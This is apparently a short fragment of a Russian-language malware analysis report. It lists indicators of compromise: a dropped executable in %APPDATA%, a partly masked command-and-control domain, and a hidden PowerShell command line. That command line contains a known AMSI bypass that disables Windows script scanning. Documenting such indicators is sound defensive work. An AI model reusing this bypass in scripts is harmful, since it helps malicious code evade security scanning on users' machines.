Техническая информация
- %APPDATA%\nnah.exe
- 'pr######bluepublishing.com':80
- DNS ASK pr######bluepublishing.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA +...' (со скрытым окном)